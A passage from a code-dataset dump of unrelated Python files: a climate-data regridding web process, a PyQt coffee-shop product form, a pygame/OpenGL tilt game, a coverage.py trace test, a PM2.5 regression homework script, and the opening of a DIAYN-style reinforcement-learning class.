neighbor interpolation each source point is\n mapped to the closest destination point. A given destination point may\n receive input from multiple source points, but no source point will go to\n more than one destination point.\n \"\"\"\n\n def __init__(self):\n inputs = [\n ComplexInput('resource', 'Resource',\n abstract='NetCDF Files or archive (tar/zip) containing NetCDF files.',\n metadata=[Metadata('Info')],\n min_occurs=1,\n max_occurs=1000,\n supported_formats=[\n Format('application/x-netcdf'),\n Format('application/x-tar'),\n Format('application/zip'),\n ]),\n\n ComplexInput('dest', 'Grid destination',\n abstract='NetCDF file whose grid defines the interpolation target.',\n metadata=[Metadata('Info')],\n min_occurs=1,\n max_occurs=1,\n supported_formats=[\n Format('application/x-netcdf'),\n Format('application/x-tar'),\n Format('application/zip'),\n ]),\n\n LiteralInput(\"method\", \"Regridding method\",\n abstract=\"Regridding method. Note that `conserve` requires grid corners to be defined.\",\n default=\"bilinear\",\n allowed_values=methods,\n data_type='string',\n min_occurs=0,\n max_occurs=1,\n ),\n\n LiteralInput(\"snippet\", \"Snippet\",\n abstract=\"Run process only for first time step.\",\n default=\"False\",\n data_type=\"boolean\",\n min_occurs=0,\n max_occurs=1)\n ]\n outputs = [\n ComplexOutput('output_log', 'Logging information',\n abstract=\"Collected logs during process run.\",\n as_reference=True,\n supported_formats=[Format('text/plain')]\n ),\n\n ComplexOutput('output', 'Links to regridded dataset',\n abstract=\"JSON file listing the regridded netCDF URLs.\",\n as_reference=True,\n supported_formats=[json_format]\n ),\n\n ComplexOutput('output_netcdf', 'NetCDF file',\n abstract=\"First NetCDF file generated by process.\",\n as_reference=True,\n supported_formats=[Format('application/x-netcdf')]\n ),\n ]\n\n super(ESMFRegridProcess, self).__init__(\n self._handler,\n identifier=\"esmf_regrid\",\n title=\"ESMF regridding\",\n abstract='Regrid netCDF files to a destination grid.',\n version=\"0.10\",\n metadata=[\n Metadata('Doc', 'http://flyingpigeon.readthedocs.io/en/latest/'),\n ],\n inputs=inputs,\n outputs=outputs,\n status_supported=True,\n store_supported=True,\n )\n\n def _handler(self, request, response):\n import uuid\n import time\n import json\n outputpath = configuration.get_config_value('server', 'outputpath')\n init_process_logger('log.txt')\n response.outputs['output_log'].file = 'log.txt'\n\n # -------------- #\n # Input handling #\n # -------------- #\n resource = archiveextract(\n resource=rename_complexinputs(request.inputs['resource']))\n LOGGER.info(\"resource: %s \" % resource)\n\n dest = archiveextract(\n resource=rename_complexinputs(request.inputs['dest']))\n LOGGER.info(\"dest: %s \" % dest)\n\n method = request.inputs['method'][0].data\n LOGGER.info(\"method: %s \" % method)\n\n snippet = request.inputs['snippet'][0].data\n LOGGER.info(\"snippet: %s \" % snippet)\n\n # -------------------- #\n # Regridding operation #\n # -------------------- #\n d = ocgis.RequestDataset(dest)\n m = getattr(ESMF.RegridMethod, method.upper())\n LOGGER.info('Start ocgis module call function')\n\n # Prepare the environment\n ocgis.env.OVERWRITE = True\n prefix = str(uuid.uuid1())\n ocgis.env.PREFIX = prefix\n\n outputs = []\n for source in resource:\n s = ocgis.RequestDataset(source)\n ops = ocgis.OcgOperations(dataset=s, regrid_destination=d, regrid_options={'regrid_method': m},\n snippet=snippet,\n dir_output=outputpath, output_format='nc', prefix=prefix\n )\n outputs.append(ops.execute())\n\n response.outputs['output_netcdf'].file = outputs[0]\n\n time_str = time.strftime(\"%Y-%m-%dT%H:%M:%SZ\", time.gmtime())\n output_json = \"esmf_regrid_results_{}.json\".format(time_str)\n with open(output_json, 'w') as f:\n f.write(json.dumps([actual_output_path(o) for o in outputs]))\n\n response.outputs['output'].file = output_json\n response.outputs['output'].output_format = json_format\n return response\n","sub_path":"flyingpigeon/processes/wps_regrid.py","file_name":"wps_regrid.py","file_ext":"py","file_size_in_byte":9157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227523140","text":"from PyQt5 import uic\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import QWidget, QAbstractItemView, QHeaderView, QTableWidgetItem, QAction, QMessageBox\n\nfrom CoffeeApp.application_coffee_practice.dao.product_dao import ProductDao\nfrom CoffeeApp.application_coffee_practice.ui.sale import SaleUI\nfrom CoffeeApp.application_coffee_practice.ui.saledetail import SaledetailUI\n\n\nclass ProductUI(QWidget):\n def __init__(self):\n super().__init__()\n self.ui = uic.loadUi(\"ui/product.ui\") # 밖에 있는 main에서 실행할때\n self.ui.show()\n self.Product = ProductDao()\n self.ui.tableWidget.setHorizontalHeaderLabels([\"코드\", \"제품\"]) # 바로 넣어 주기\n # row단위 선택 / 그전에는 셀 단위로 선택 되었음\n self.ui.tableWidget.setSelectionBehavior(QAbstractItemView.SelectRows)\n # 수정 불가능\n self.ui.tableWidget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n # 균일한 간격으로 재배치\n self.ui.tableWidget.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.ui.btn_search.clicked.connect(self.select_item)\n self.ui.btn_add.clicked.connect(self.add_item)\n self.ui.btn_update.clicked.connect(self.update_item)\n self.ui.btn_del.clicked.connect(self.delete_item)\n self.ui.btn_init.clicked.connect(self.init_item)\n self.ui.btn_sale.clicked.connect(self.show_sale) # 가격조정show\n self.ui.btn_saledetail.clicked.connect(self.show_saledetail) # 판매세부내역show\n self.ui.btn_update.hide()\n self.load_data(self.Product.select_item())\n # 마우스 우클릭시 메뉴\n self.set_context_menu(self.ui.tableWidget)\n\n def init_item(self):\n self.ui.le_code.clear()\n self.ui.le_name.clear()\n self.ui.btn_add.show()\n self.ui.btn_del.show()\n self.ui.btn_init.show()\n self.ui.btn_search.show()\n self.ui.le_code.setEnabled(True)\n self.ui.le_name.setEnabled(True)\n self.load_data(self.Product.select_item())\n\n def show_sale(self):\n self.show_sale = SaleUI() # 창은 생성해두\n\n def show_saledetail(self):\n self.show_saledetail = SaledetailUI()\n\n def __update(self):\n QMessageBox.information(self, '수정', \"수정할 자료를 불러오겠습니다.\", QMessageBox.Ok)\n selectionIdxs = self.ui.tableWidget.selectedIndexes()[0]\n self.ui.le_code.setText(self.ui.tableWidget.item(selectionIdxs.row(), 0).text())\n self.ui.le_name.setText(self.ui.tableWidget.item(selectionIdxs.row(), 1).text())\n self.ui.btn_update.show()\n self.ui.le_code.setEnabled(False)\n # self.ui.le_name.setEnabled(True)\n self.ui.btn_add.hide()\n self.ui.btn_del.hide()\n self.ui.btn_init.hide()\n self.ui.btn_search.hide()\n\n def __delete(self):\n QMessageBox.information(self, '삭제', \"삭제 하겠습니다.\", QMessageBox.Ok)\n selectionIdxs = self.ui.tableWidget.selectedIndexes()[0] # 여러개중 하나 선택하기\n\n def set_context_menu(self,tv):\n tv.setContextMenuPolicy(Qt.ActionsContextMenu) # 바로가기 메뉴를 달겠다.\n update_action = QAction(\"수정할 자료 불러오기\", tv)\n tv.addAction(update_action) # 마우스 우 클릭시 Qaction실행\n update_action.triggered.connect(self.__update)\n\n def get_item_from_le(self):\n code = self.ui.le_code.text()\n name = self.ui.le_name.text()\n return self.create_item(code, name)\n\n def create_item(self, code, name):\n item_code = QTableWidgetItem()\n item_code.setTextAlignment(Qt.AlignCenter) # Qt Core\n item_code.setData(Qt.DisplayRole, code)\n item_name = QTableWidgetItem()\n item_name.setTextAlignment(Qt.AlignCenter)\n item_name.setData(Qt.DisplayRole, name)\n return item_code, item_name\n\n def load_data(self, data):\n self.ui.tableWidget.setRowCount(0) # 행 초기화\n for idx, (code, name) in enumerate(data): # enumerate 0, 1, 2 담긴다\n item_code, item_name = self.create_item(code, name)\n nextIdx = self.ui.tableWidget.rowCount()\n self.ui.tableWidget.insertRow(nextIdx)\n self.ui.tableWidget.setItem(nextIdx, 0, item_code)\n self.ui.tableWidget.setItem(nextIdx, 1, item_name)\n\n def add_item(self):\n item_code, item_name = self.get_item_from_le() # 밑에서 받아오기\n currentIdx = self.ui.tableWidget.rowCount()\n self.ui.tableWidget.insertRow(currentIdx) # Row 추가\n self.Product.insert_item(self.ui.le_code.text(), self.ui.le_name.text())\n self.init_item()\n self.load_data(self.Product.select_item())\n QMessageBox.information(self, '추가', \"추가 되었습니다.\", QMessageBox.Ok)\n\n def update_item(self):\n item_code, item_name = self.get_item_from_le() # 밑에서 받아오기\n selectionIdxs = self.ui.tableWidget.selectedIndexes()[0]\n self.Product.update_item(self.ui.le_name.text(), self.ui.le_code.text() )\n self.load_data(self.Product.select_item())\n self.init_item()\n self.ui.btn_update.hide()\n QMessageBox.information(self, '수정', \"수정 되었습니다.\", QMessageBox.Ok)\n\n def delete_item(self):\n selectionIdxs = self.ui.tableWidget.selectedIndexes()[0] # 여러개중 하나 선택하기\n self.Product.delete_item(self.ui.tableWidget.item(selectionIdxs.row(), 0).text())\n self.init_item()\n self.load_data(self.Product.select_item())\n QMessageBox.information(self, '삭제', \"삭제 되었습니다.\", QMessageBox.Ok)\n\n def select_item(self):\n item_code, item_name = self.get_item_from_le() # 밑에서 받아오기\n currentIdx = self.ui.tableWidget.rowCount()\n self.load_data(self.Product.select_item(self.ui.le_code.text()))\n\n\n\n","sub_path":"03_Application_Coffee(Pyqt_MySQL)/01_application_coffee_aworkerJI/ui/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":5968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"592041630","text":"#!/usr/bin/python\n\nimport pygame\nimport urllib\nimport sys\nimport threading\nimport numpy as np\nimport json\nimport webclient\nfrom client import getGame, resetGame\nfrom Game import *\nfrom Angles import *\nfrom User import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom math import radians\nfrom pygame.locals import *\nfrom constants import *\n\n##################################################################################\n## Graphical display / game code\n##################################################################################\n\n# This helps my tiny brain\nGRID_MINX = -2\nGRID_MAXX = 2\nGRID_MINY = -1\nGRID_MAXY = 1\nGRID_MINZ = -1\nGRID_MAXZ = 1\nCOLOR_WHITE = (1.0, 1.0, 1.0)\nCOLOR_BLACK = (.0, .0, .0)\nCOLOR_BLUE = (.5, .5, .7)\nTEXTORIGIN_ANGLE = (0,GRID_MINY - 0.52,GRID_MAXZ)\nTEXT_NOGAME = [\"Hit n to start\", \"new game\"]\nTEXTORIGIN_GAMENAME1 = (GRID_MINX,GRID_MINY - 0.36,GRID_MAXZ)\nTEXTORIGIN_GAMENAME2 = (GRID_MINX,GRID_MINY - 0.56,GRID_MAXZ)\nTEXTORIGIN_GAMESCORE = (GRID_MAXX - 0.5,GRID_MINY - 0.36,GRID_MAXZ)\nTEXTORIGIN_GAMETIME = (GRID_MAXX - 0.5,GRID_MINY - 0.56,GRID_MAXZ)\nTEXTORIGIN_INPUTS = (0, 0.1, GRID_MAXZ/2)\nTEXTOFFSET_INPUTS = (0, -0.3, 0)\nLOGOORIGIN = (0,GRID_MAXY,GRID_MAXZ)\nTEXT_SPACEWAITING = \"\"\nGUELOGO_PATH = \"img/gue-logo.bmp\"\n\ndebug = True\n\ndef resize(width, height):\n glViewport(0, 0, width, height)\n glMatrixMode(GL_PROJECTION)\n glLoadIdentity()\n gluPerspective(45.0, float(width) / height, 0.001, 10.0)\n glMatrixMode(GL_MODELVIEW)\n glLoadIdentity()\n gluLookAt(0.0, 0.0, 5.0,\n 0.0, 0.0, 0.0,\n 0.0, 1.0, 0.0)\n\ndef init():\n glEnable(GL_DEPTH_TEST)\n glClearColor(0.0, 0.0, 0.0, 0.0)\n glShadeModel(GL_SMOOTH)\n glEnable(GL_BLEND)\n glEnable(GL_POLYGON_SMOOTH)\n glHint(GL_POLYGON_SMOOTH_HINT, GL_NICEST)\n glEnable(GL_COLOR_MATERIAL)\n glEnable(GL_LIGHTING)\n glEnable(GL_LIGHT0)\n glLightfv(GL_LIGHT0, GL_AMBIENT, (0.3, 0.3, 0.3, 1.0));\n\ndef getScreenCoords(position):\n model = glGetDoublev(GL_MODELVIEW_MATRIX)\n proj = glGetDoublev(GL_PROJECTION_MATRIX)\n view = glGetIntegerv(GL_VIEWPORT)\n return gluProject(position[0], position[1], position[2], model, proj, view)\n\ndef drawText(position, textString, size, centered = True, rightaligned = False, color = RGBA_BLACK, background = RGBA_WHITE): \n font = pygame.font.Font (None, size)\n textSurface = font.render(textString, True, color, background) \n textData = pygame.image.tostring(textSurface, \"RGBA\", True)\n # Size is in window coordinates, so work in that system \n screenpos = getScreenCoords(position)\n if centered:\n textpos = (screenpos[0] - (textSurface.get_width()/2), screenpos[1], screenpos[2])\n else: \n if rightaligned:\n textpos = (screenpos[0] - (textSurface.get_width()), screenpos[1], screenpos[2])\n else:\n textpos = (screenpos[0], screenpos[1], screenpos[2])\n glEnable(GL_BLEND)\n glWindowPos3d(*textpos) \n glDrawPixels(textSurface.get_width(), textSurface.get_height(), GL_RGBA, GL_UNSIGNED_BYTE, textData)\n\ndef drawLogo(position, centered = True):\n img = pygame.image.load(GUELOGO_PATH)\n img.convert()\n imgData = pygame.image.tostring(img, \"RGBA\", True)\n # Size is in window coordinates, so work in that system \n screenpos = getScreenCoords(position)\n if centered:\n imgpos = (screenpos[0] - (img.get_width()/2), screenpos[1], screenpos[2])\n else:\n imgpos = (screenpos[0], screenpos[1], screenpos[2])\n glWindowPos3d(*imgpos) \n glDrawPixels(img.get_width(), img.get_height(), GL_RGBA, GL_UNSIGNED_BYTE, imgData)\n\ndef exit():\n pygame.quit()\n sys.exit(0)\n\ndef getText(origin, titleText):\n inputting = True\n inputValue = \"\"\n while inputting:\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n drawText(origin, titleText, 32)\n drawText(np.add(origin,TEXTOFFSET_INPUTS), inputValue, 32)\n pygame.display.flip()\n\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == KEYDOWN and event.key == K_RETURN:\n inputting = False\n return inputValue\n if event.type == KEYDOWN and event.key == K_ESCAPE:\n inputting = False\n return \"\"\n if event.type == KEYDOWN and event.key == K_BACKSPACE:\n inputValue = inputValue[:-1]\n break\n if event.type == KEYDOWN:\n inputValue = inputValue + event.unicode\n\ndef newGame():\n if debug:\n print(\"New game\")\n resetGame(getGame().gameName)\n email = getText(TEXTORIGIN_INPUTS, \"Please type your email address\")\n print(email)\n if email == \"\":\n return\n user = findUser(email=email)\n if not user:\n # User doesn't exist\n userName = getText(TEXTORIGIN_INPUTS, \"Please type your name\")\n print(userName)\n if userName == \"\":\n return\n user = User(userName, email)\n user.save()\n getGame().setUser(user)\n else:\n getGame().setUser(user)\n\n getGame().state = GAME_WAITING\n\ndef run(gameName):\n pygame.init()\n DISPLAY_FLAGS = HWSURFACE | OPENGL | DOUBLEBUF\n SCREEN_SIZE = [0,0]\n info = pygame.display.Info()\n if debug:\n print(\"Screen width %d, Height %d\" % (info.current_w, info.current_h))\n# if info.current_w <= 800:\n DISPLAY_FLAGS = DISPLAY_FLAGS | FULLSCREEN | NOFRAME\n# else:\n# SCREEN_SIZE = [800, 600]\n screen = pygame.display.set_mode( SCREEN_SIZE, DISPLAY_FLAGS )\n# newsize = (min(info.current_w, 800), min(info.current_h,600))\n newsize = (info.current_w, info.current_h)\n resize(*newsize)\n init()\n clock = pygame.time.Clock()\n backdrop = Backdrop(COLOR_BLACK)\n cube = Cube((0.0, 0.0, 0.0), COLOR_BLUE)\n\n angles = Angles(SERVER_URL)\n angles.start()\n\n getGame().setGameName(gameName)\n\n while True:\n then = pygame.time.get_ticks()\n for event in pygame.event.get():\n if event.type == QUIT:\n exit()\n if event.type == KEYDOWN and (event.key == K_ESCAPE or event.key == K_q):\n # Escape and Q either quit the current game or the app\n if getGame().state == GAME_NONE:\n exit()\n else:\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n drawText(TEXTORIGIN_INPUTS, \"Are you sure you want to finish game? Y/N\", 32)\n pygame.display.flip()\n angles.pause()\n while angles.isPaused():\n then2 = pygame.time.get_ticks()\n for event2 in pygame.event.get():\n if event2.type == KEYDOWN and (event2.key == K_y):\n getGame().score = 0.0\n getGame().state = GAME_NONE\n angles.unpause()\n if event2.type == KEYDOWN and (event2.key == K_n):\n angles.unpause()\n if event.type == KEYDOWN and event.key == K_n:\n angles.pause()\n newGame()\n angles.unpause()\n if event.type == KEYDOWN and event.key == K_c:\n angles.calibrate()\n if getGame().state == GAME_RUNNING and event.type == KEYDOWN and event.key == K_SPACE:\n angles.pause()\n # Space ends the current game and records the score\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n origin = TEXTORIGIN_INPUTS\n drawText(origin, \"Congratulations {}!\".format(getGame().user.userName), 32)\n origin = np.add(origin, TEXTOFFSET_INPUTS)\n drawText(origin, \"Your final score was {:10.1f}\".format(getGame().score), 32)\n origin = np.add(origin, TEXTOFFSET_INPUTS)\n drawText(origin, \"Press space to continue\", 32)\n pygame.display.flip()\n getGame().save()\n while angles.isPaused():\n then2 = pygame.time.get_ticks()\n for event2 in pygame.event.get():\n if event2.type == KEYDOWN and (event2.key == K_SPACE):\n getGame().score = 0.0\n getGame().state = GAME_NONE\n angles.unpause()\n if getGame().state == GAME_WAITING and event.type == KEYDOWN and event.key == K_SPACE:\n angles.pause()\n getGame().score = 0.0\n getGame().state = GAME_RUNNING\n angles.setStartTime()\n angles.unpause()\n\n glClearColor(1.0, 1.0, 1.0, 1.0)\n glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n backdrop.render()\n glPushMatrix()\n glRotate(angles.getY(), 0, 0, -1)\n cube.render()\n glPopMatrix()\n drawLogo(LOGOORIGIN)\n if getGame().state != GAME_WAITING:\n# if debug:\n# print(\"getY %.2f Y %.2f calibrate_y %.2f\" % (angles.getY(), angles.y, angles.calibrate_y))\n# print(\"getTilt %.2f Tilt %.2f calibrate_tilt %.2f\" % (angles.getTilt(), angles.tilt, angles.calibrate_tilt))\n drawText(TEXTORIGIN_ANGLE, \"%.2f (%.2f)\" % (angles.getTilt(), abs(angles.tilt)) + u'\\N{DEGREE SIGN}', 64, color = angles.getColor())\n if getGame().state != GAME_NONE:\n if getGame().state == GAME_WAITING:\n drawText(TEXTORIGIN_GAMENAME1, TEXT_SPACEWAITING, 32, False)\n else:\n drawText(TEXTORIGIN_GAMENAME1, getGame().user.userName, 32, False)\n drawText(TEXTORIGIN_GAMENAME2, getGame().user.initials, 32, False)\n drawText(TEXTORIGIN_GAMESCORE, \"Score: {:10.1f}\".format(getGame().score), 32, rightaligned = True)\n drawText(TEXTORIGIN_GAMETIME, \"Time: {:10.1f}\".format(getGame().duration), 32, rightaligned = True)\n else:\n drawText(TEXTORIGIN_GAMENAME1, TEXT_NOGAME[0], 32, False)\n drawText(TEXTORIGIN_GAMENAME2, TEXT_NOGAME[1], 32, False)\n\n pygame.display.flip()\n\nclass Backdrop(object):\n def __init__(self, color):\n self.color = color\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n glLineWidth(1)\n glBegin(GL_LINES)\n\n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1,1)\n glVertex3f(x/10.,-1,-1)\n \n for x in range(-20, 22, 2):\n glVertex3f(x/10.,-1, -1)\n glVertex3f(x/10., 1, -1)\n \n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f( 2, -1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f(-2, -1, z/10.)\n glVertex3f(-2, 1, z/10.)\n\n for z in range(-10, 12, 2):\n glVertex3f( 2, -1, z/10.)\n glVertex3f( 2, 1, z/10.)\n\n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f( 2, y/10., -1)\n \n for y in range(-10, 12, 2):\n glVertex3f(-2, y/10., -1)\n glVertex3f(-2, y/10., 1)\n \n for y in range(-10, 12, 2):\n glVertex3f(2, y/10., -1)\n glVertex3f(2, y/10., 1)\n \n glEnd()\n\nclass Cube(object):\n\n def __init__(self, position, color):\n self.position = position\n self.color = color\n\n # Cube information\n num_faces = 6\n\n vertices = [ (-1.0, -0.05, 0.5),\n (1.0, -0.05, 0.5),\n (1.0, 0.05, 0.5),\n (-1.0, 0.05, 0.5),\n (-1.0, -0.05, -0.5),\n (1.0, -0.05, -0.5),\n (1.0, 0.05, -0.5),\n (-1.0, 0.05, -0.5) ]\n\n normals = [ (0.0, 0.0, +1.0), # front\n (0.0, 0.0, -1.0), # back\n (+1.0, 0.0, 0.0), # right\n (-1.0, 0.0, 0.0), # left\n (0.0, +1.0, 0.0), # top\n (0.0, -1.0, 0.0) ] # bottom\n\n vertex_indices = [ (0, 1, 2, 3), # front\n (4, 5, 6, 7), # back\n (1, 5, 6, 2), # right\n (0, 4, 7, 3), # left\n (3, 2, 6, 7), # top\n (0, 1, 5, 4) ] # bottom\n\n def render(self):\n then = pygame.time.get_ticks()\n glColor(self.color)\n\n vertices = self.vertices\n\n # Draw all 6 faces of the cube\n glBegin(GL_QUADS)\n\n for face_no in xrange(self.num_faces):\n glNormal3dv(self.normals[face_no])\n v1, v2, v3, v4 = self.vertex_indices[face_no]\n glVertex(vertices[v1])\n glVertex(vertices[v2])\n glVertex(vertices[v3])\n glVertex(vertices[v4])\n glEnd()\n\n","sub_path":"client/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":12947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"306077656","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt\n\n# Show the current frame's trace function, so that we can test what the\n# command-line options do to the trace function used.\n\nimport sys\n\n# Show what the trace function is. If a C-based function is used, then f_trace\n# may be None.\ntrace_fn = sys._getframe(0).f_trace\nif trace_fn is None:\n trace_name = \"None\"\nelse:\n # Get the name of the tracer class. Py3k has a different way to get it.\n try:\n trace_name = trace_fn.im_class.__name__\n except AttributeError:\n try:\n trace_name = trace_fn.__self__.__class__.__name__\n except AttributeError:\n # A C-based function could also manifest as an f_trace value\n # which doesn't have im_class or __self__.\n trace_name = trace_fn.__class__.__name__\n\nprint(\"%s %s\" % (sys.argv[1], trace_name))\n","sub_path":"tests/farm/run/src/showtrace.py","file_name":"showtrace.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"457421210","text":"import numpy as np\nimport csv\nimport sys\n\ndef load_data(file_name):\n file = open(file_name, 'r', encoding='big5')\n train_data = csv.reader(file, delimiter = ',')\n data = [[] for i in range(18)] # 記錄18種觀測數據\n n_row = 0\n \n for row in train_data:\n if n_row != 0:\n for i in range(3, 27, 1): # 第 3 ~ 26 欄是24小時的資料\n if row[i] != 'NR':\n data[(n_row-1)%18].append(float(row[i]))\n else:\n data[(n_row-1)%18].append(float(0))\n n_row += 1\n\n file.close()\n \n # preprocessing data\n i = 0\n while i < 12*20*24:\n if data[9][i] < 0:\n idx = i\n while data[9][idx] < 0:\n idx += 1\n diff = idx - i + 1\n for j in range(i, idx, 1):\n data[9][j] = data[9][j-1] + (data[9][idx] - data[9][i-1]) / diff\n i = idx + 1\n else:\n i += 1\n \n x = []\n y = []\n \n for i in range(12):\n for j in range(471):\n x.append([])\n for k in range(18):\n for s in range(9):\n x[471*i+j].append(data[k][480*i+j+s])\n y.append(data[9][480*i+j+9])\n \n x = np.array(x)\n y = np.array(y)\n \n return x, y\n\ndef adagrad(x, y):\n x = np.concatenate((np.ones((x.shape[0], 1)), x), axis = 1)\n x_t = x.transpose()\n \n w = np.zeros(x.shape[1])\n iteration = 100000\n lr = 1\n lamda = 0.00\n pre_gra = np.zeros(x.shape[1])\n \n for i in range(1, iteration+1, 1):\n _y = np.dot(x, w)\n loss = _y - y + lamda * np.sum(w**2)\n cost = np.sqrt(np.sum(loss**2) / len(x))\n gra = 2 * np.dot(x_t, loss) + 2 * lamda * w\n pre_gra += gra**2\n ada = np.sqrt(pre_gra)\n w -= lr * gra / ada\n \n if i % 10000 == 0:\n print(\"iteration %d: cost = %f\" % (i, cost))\n \n return w\n\ndef load_file(input_file):\n file = open(input_file, 'r', encoding='big5')\n test_data = csv.reader(file, delimiter = ',')\n x_test = []\n n_row = 0\n \n for row in test_data:\n if n_row % 18 == 0:\n x_test.append([])\n if n_row % 18 == 9:\n for i in range(2, 11, 1):\n if float(row[i]) < 0:\n if i == 2:\n x_test[n_row//18].append(float(row[i+1]))\n elif i == 10:\n x_test[n_row//18].append(float(row[i-1]))\n else:\n x_test[n_row//18].append((float(row[i-1]) + float(row[i+1])) / 2)\n else:\n x_test[n_row//18].append(float(row[i]))\n else:\n for i in range(2, 11, 1):\n if row[i] != 'NR':\n x_test[n_row//18].append(float(row[i]))\n else:\n x_test[n_row//18].append(float(0))\n n_row += 1\n \n x_test = np.array(x_test)\n \n return x_test\n\ndef predict(x_test):\n w = np.load('model_best.npy')\n x_test = np.concatenate((np.ones((x_test.shape[0], 1)), x_test), axis = 1)\n y_test = np.dot(x_test, w)\n \n for i in range(len(y_test)):\n if y_test[i] < 0:\n y_test[i] = 0\n \n return y_test\n\ndef output(y_test, output_file):\n file = open(output_file, 'w+')\n out_file = csv.writer(file, delimiter = ',', lineterminator = '\\n')\n out_file.writerow(['id', 'value'])\n for i in range(len(y_test)):\n out_file.writerow(['id_'+str(i), y_test[i]])\n file.close()\n\n\nif __name__ == '__main__':\n# x, y = load_data('./data/train.csv')\n# w = adagrad(x, y)\n# np.save('model_best.npy', w)\n \n input_file = sys.argv[1]\n output_file = sys.argv[2]\n \n x_test = load_file(input_file)\n y_test = predict(x_test)\n output(y_test, output_file)\n ","sub_path":"hw1/hw1_best.py","file_name":"hw1_best.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"635153606","text":"from typing import Any, Dict, List, Optional, Tuple, Type, Union\nimport time\nfrom types import FunctionType as function\nimport gym\nimport sys\nimport numpy as np\nfrom numpy.core.fromnumeric import mean\nimport torch as th\nfrom collections import deque\nfrom torch.nn import functional as F\nimport pathlib\nimport io\nfrom scipy.special import expit as sigm\nfrom stable_baselines3.common.save_util import (\n load_from_zip_file,\n recursive_getattr,\n recursive_setattr,\n save_to_zip_file,\n)\n\nfrom stable_baselines3.common.noise import ActionNoise\nfrom stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm\nfrom stable_baselines3.common.type_aliases import (\n GymEnv,\n MaybeCallback,\n RolloutReturnZ,\n Schedule,\n TrainFreq,\n TrainFrequencyUnit,\n)\nfrom stable_baselines3.common.utils import (\n safe_mean,\n should_collect_more_steps,\n polyak_update,\n check_for_correct_spaces,\n)\nfrom stable_baselines3.common.base_class import BaseAlgorithm\nfrom stable_baselines3.diayn import disc\nfrom stable_baselines3.diayn.policies import DIAYNPolicy\nfrom stable_baselines3.diayn.diayn import DIAYN\nfrom stable_baselines3.common.vec_env import VecEnv\nfrom stable_baselines3.common.callbacks import BaseCallback\nfrom stable_baselines3.common.buffers import ReplayBufferZ, ReplayBufferZExternalDisc\nfrom stable_baselines3.common.exp_utils import DiscriminatorFunction\nfrom stable_baselines3.diayn.disc import Discriminator\nfrom stable_baselines3.common.utils import get_linear_fn\n\nclass SEQDIAYN(DIAYN):\n \"\"\"\n Diversity is All You Need\n Built on top of SAC\n\n :param policy: The policy model to use (MlpPolicy, CnnPolicy, ...)\n :param env: The environment to learn from (if registered in Gym, can be str)\n :param prior: The prior distribution for the skills p(z), usually uniform categorical\n :param learning_rate: learning rate for adam optimizer,\n the same learning rate will be used for all networks (Q-Values, Actor and Value function)\n it can be a function of the current progress remaining (from 1 to 0)\n :param buffer_size: size of the replay buffer\n :param learning_starts: how many steps of the model to collect transitions for before learning starts\n :param batch_size: Minibatch size for each gradient update\n :param tau: the soft update coefficient (\"Polyak update\", between 0 and 1)\n :param gamma: the discount factor\n :param train_freq: Update the model every ``train_freq`` steps. Alternatively pass a tuple of frequency and unit\n like ``(5, \"step\")`` or ``(2, \"episode\")``.\n :param gradient_steps: How many gradient steps to do after each rollout (see ``train_freq``)\n Set to ``-1`` means to do as many gradient steps as steps done in the environment\n during the rollout.\n :param action_noise: the action noise type (None by default), this can help\n for hard exploration problem. Cf common.noise for the different action noise type.\n :param optimize_memory_usage: Enable a memory efficient variant of the replay buffer\n at a cost of more complexity.\n See https://github.com/DLR-RM/stable-baselines3/issues/37#issuecomment-637501195\n :param ent_coef: Entropy regularization coefficient. (Equivalent to\n inverse of reward scale in the original SAC paper.) Controlling exploration/exploitation trade-off.\n Set it to 'auto' to learn it automatically (and 'auto_0.1' for using 0.1 as initial value)\n :param target_update_interval: update the target network every ``target_network_update_freq``\n gradient steps.\n :param target_entropy: target entropy when learning ``ent_coef`` (``ent_coef = 'auto'``)\n :param use_sde: Whether to use generalized State Dependent Exploration (gSDE)\n instead of action noise exploration (default: False)\n :param sde_sample_freq: Sample a new noise matrix every n steps when using gSDE\n Default: -1 (only sample at the beginning of the rollout)\n :param use_sde_at_warmup: Whether to use gSDE instead of uniform sampling\n during the warm up phase (before learning starts)\n :param create_eval_env: Whether to create a second environment that will be\n used for evaluating the agent periodically. (Only available when passing string for the environment)\n :param policy_kwargs: additional arguments to be passed to the policy on creation\n :param verbose: the verbosity level: 0 no output, 1 info, 2 debug\n :param seed: Seed for the pseudo random generators\n :param device: Device (cpu, cuda, ...) on which the code should be run.\n Setting it to auto, the code will be run on the GPU if possible.\n :param _init_setup_model: Whether or not to build the network at the creation of the instance\n :param disc_on: A list of index, or a DiscriminatorFunction or 'all'. It designates which component or\n transformation of the state space you want to pass to the discriminator.\n :param combined_rewards: whether or not you want to learn the task AND learn skills, by default this is\n False in DIAYN (unsupervised method).\n :param beta: balance parameter between the true and 